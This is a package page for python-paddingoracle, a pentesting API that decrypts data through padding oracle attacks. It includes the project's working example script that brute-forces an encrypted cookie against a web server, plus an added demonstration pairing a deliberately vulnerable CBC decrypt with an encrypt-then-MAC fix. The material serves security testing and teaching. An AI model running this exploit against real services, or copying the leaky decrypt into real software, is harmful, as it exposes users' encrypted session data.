A portable, padding oracle exploit API
Project description
python-paddingoracle is an API that provides pentesters a customizable alternative to PadBuster and other padding oracle exploit tools that can’t easily (without a heavy rewrite) be used in unique, per-app scenarios. Think non-HTTP applications, raw sockets, client applications, unique encodings, etc.
Usage:
To use the paddingoracle API, subclass PaddingOracle and implement its oracle() method, raising BadPaddingException whenever the target reveals that the submitted ciphertext had invalid padding (the padding oracle). To decrypt data, pass the raw encrypted bytes to decrypt() together with a block size (typically 8 or 16) and an optional iv parameter.
An example (taken from the project's example script):
```python
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
from urllib import quote, unquote
import logging
import requests
import socket
import sys
import time


class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        # Encode the candidate ciphertext the same way the application does
        somecookie = quote(b64encode(data))
        self.session.cookies['somecookie'] = somecookie

        while True:
            try:
                response = self.session.get('http://www.example.com/',
                                            stream=False, timeout=5, verify=False)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)

        if response.ok:
            logging.debug('No padding exception raised on %r', somecookie)
            return

        # An HTTP 500 error was returned, likely due to incorrect padding
        raise BadPaddingException


if __name__ == '__main__':
    if not sys.argv[1:]:
        print('Usage: %s <somecookie value>' % (sys.argv[0], ))
        sys.exit(1)

    logging.basicConfig(level=logging.DEBUG)

    encrypted_cookie = b64decode(unquote(sys.argv[1]))

    padbuster = PadBuster()
    cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8))

    print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))
```
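The signal that oracle() above keys on is a server-side defect: the application unpads attacker-controlled ciphertext and answers differently when the padding is wrong. The following added example (not part of python-paddingoracle) shows that leaky decrypt beside the encrypt-then-MAC form that removes the oracle; it uses a toy XOR block function in place of a real cipher, and the keys and plaintext are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 8  # block size, matching block_size=8 in the page's PadBuster example
class PaddingError(Exception): pass  # distinct failure on bad PKCS#7 padding: the oracle signal
class DecryptError(Exception): pass  # single generic failure used by the hardened path

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _toy_block(key, block):
    # Stand-in for a real block cipher (XOR with a key-derived block): invertible so CBC
    # chaining behaves as with AES, but NOT secure; here only to avoid dependencies.
    return _xor(block, hashlib.sha256(key).digest()[:BLOCK])

def cbc_encrypt(key, iv, plaintext):
    pad = BLOCK - len(plaintext) % BLOCK
    data, out, prev = plaintext + bytes([pad]) * pad, b'', iv
    for i in range(0, len(data), BLOCK):
        prev = _toy_block(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def leaky_decrypt(key, iv, ciphertext):
    # Vulnerable: unpads attacker-controlled ciphertext and fails distinctly (the page's HTTP 500).
    pt, prev = b'', iv
    for i in range(0, len(ciphertext), BLOCK):
        pt += _xor(_toy_block(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    pad = pt[-1]
    if not 1 <= pad <= BLOCK or pt[-pad:] != bytes([pad]) * pad:
        raise PaddingError
    return pt[:-pad]

def seal(enc_key, mac_key, iv, plaintext):
    ct = cbc_encrypt(enc_key, iv, plaintext)
    return iv + ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()

def hardened_decrypt(enc_key, mac_key, token):
    # Encrypt-then-MAC: authenticate first; tampered data fails uniformly before padding is examined.
    iv, ct, tag = token[:BLOCK], token[BLOCK:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, iv + ct, hashlib.sha256).digest(), tag):
        raise DecryptError
    return leaky_decrypt(enc_key, iv, ct)  # only ever sees ciphertext this service produced

def probe(decrypt, *args):  # what a remote caller observes: plaintext, or just the error type
    try:
        return decrypt(*args)
    except Exception as exc:
        return type(exc).__name__
```

Against leaky_decrypt, flipping the last ciphertext byte and flipping the first one are distinguishable from outside (PaddingError versus a silently altered plaintext); against hardened_decrypt both produce the same DecryptError, which is the property a fix should be tested for.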
Credits
python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science.
Project details
Download files
Source Distribution
Built Distribution
File details
Details for the file paddingoracle-0.2.2.tar.gz.
File metadata
- Download URL: paddingoracle-0.2.2.tar.gz
- Upload date:
- Size: 5.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
File hashes
Algorithm | Hash digest
---|---
SHA256 | bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d
MD5 | f59e537b890a0ba6cbfaa9bd68dc5d50
BLAKE2b-256 | 748db12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507
File details
Details for the file paddingoracle-0.2.2-py2-none-any.whl.
File metadata
- Download URL: paddingoracle-0.2.2-py2-none-any.whl
- Upload date:
- Size: 5.6 kB
- Tags: Python 2
- Uploaded using Trusted Publishing? No
File hashes
Algorithm | Hash digest
---|---
SHA256 | 0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2
MD5 | eb6224f3fdda27a7b3c6d9f21f7c8541
BLAKE2b-256 | 4846198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f